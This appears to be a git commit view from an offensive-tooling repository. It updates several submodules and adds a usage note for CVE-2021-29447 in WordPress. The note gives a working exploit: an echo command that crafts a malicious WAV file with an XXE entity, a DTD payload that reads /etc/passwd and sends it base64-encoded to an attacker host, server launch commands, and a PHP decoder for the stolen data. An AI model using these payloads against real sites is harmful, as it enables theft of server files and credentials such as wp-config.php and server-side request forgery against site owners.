added wp exploit
This commit is contained in:
parent
6ea42f41a7
commit
2d199c8ba8
|
@ -1 +1 @@
|
||||||
Subproject commit 88321a332f52d0fa01cad450bd093c8b34eb3213
|
Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631
|
|
@ -1 +1 @@
|
||||||
Subproject commit 056873d277f7554c10c2eafb10fece59d986036f
|
Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43
|
|
@ -0,0 +1,30 @@
|
||||||
|
# CVE-2021-29447
|
||||||
|
|
||||||
|
* Upload of wav file has following consequences
|
||||||
|
* **Arbitrary File Disclosure** for example `wp-config.php`
|
||||||
|
* **Server Side Request Forgery**
|
||||||
|
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
* Create `wav` Payload
|
||||||
|
```sh
|
||||||
|
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
|
||||||
|
```
|
||||||
|
* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
|
||||||
|
```sh
|
||||||
|
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
|
||||||
|
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
|
||||||
|
```
|
||||||
|
|
||||||
|
* Launch http server
|
||||||
|
```sh
|
||||||
|
php -S 0.0.0.0:8000
|
||||||
|
python -m http.server
|
||||||
|
```
|
||||||
|
* Copy returned base64 into `php` file
|
||||||
|
```php
|
||||||
|
<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
2
nishang
2
nishang
|
@ -1 +1 @@
|
||||||
Subproject commit 414ee1104526d7057f9adaeee196d91ae447283e
|
Subproject commit 0090ba2e51b7503c3245081894c0fc87b696f941
|
Binary file not shown.
Loading…
Reference in New Issue